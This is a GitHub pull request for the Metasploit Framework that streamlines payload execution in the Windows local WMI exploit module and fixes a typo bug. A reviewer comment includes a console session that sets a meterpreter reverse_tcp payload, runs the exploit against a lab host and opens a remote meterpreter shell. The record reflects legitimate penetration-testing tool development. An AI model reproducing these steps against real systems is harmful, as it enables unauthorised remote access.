Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

WMIC ExtAPI Improvements #4316

Merged
merged 3 commits into from Jan 16, 2015
Merged

WMIC ExtAPI Improvements #4316

merged 3 commits into from Jan 16, 2015

Conversation

Meatballs1
Copy link
Contributor

With the WMI calls available in ExtAPI we no longer need to stage the powershell payload in the environment variables, we can do a single call to execute it.

Also fixes an issue in Msf::Core::Post::WMIC which called starts_with instead of starts_with?

Resolves: #4308

Verification

@bcook-r7 bcook-r7 self-assigned this Dec 23, 2014
@busterb
Copy link
Member

busterb commented Jan 16, 2015

Cool, seems to work for me:

msf exploit(handler) > use exploit/windows/local/wmi 
msf exploit(wmi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(wmi) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf exploit(wmi) > set SMBUser Administrator
SMBUser => Administrator
msf exploit(wmi) > set SESSION 1
SESSION => 1
msf exploit(wmi) > set rhosts 192.168.56.2
rhosts => 192.168.56.2
msf exploit(wmi) > run

[*] Started reverse handler on 192.168.56.1:4444 
[*] [192.168.56.2] Executing payload
[+] [192.168.56.2] Process Started PID: 1056
[*] Sending stage (770048 bytes) to 192.168.56.2

meterpreter > sysinfo
Computer        : WIN-2BJK4SPOGFL
OS              : Windows 2012 R2 (Build 9600).
Architecture    : x64 (Current Process is WOW64)
System Language : en_US
Meterpreter     : x86/win32

@bcook-r7 bcook-r7 merged commit e471271 into rapid7:master Jan 16, 2015
bcook-r7 pushed a commit that referenced this pull request Jan 16, 2015
Land #4316, Meatballs1 streamlines payload execution for exploits/win…
a2a1a90 
…dows/local/wmi

also fixes a typo bug in WMIC
@Meatballs1
Copy link
Contributor Author

Cheers ears

@Meatballs1 Meatballs1 deleted the wmic_psh_improvement branch January 17, 2015 10:40
@Meatballs1 Meatballs1 mentioned this pull request Mar 11, 2015
Closed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
bug feature library module
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

Exploit Windows Local WMI Improvements
4 participants
@Meatballs1 @busterb @todb-r7 @bcook-r7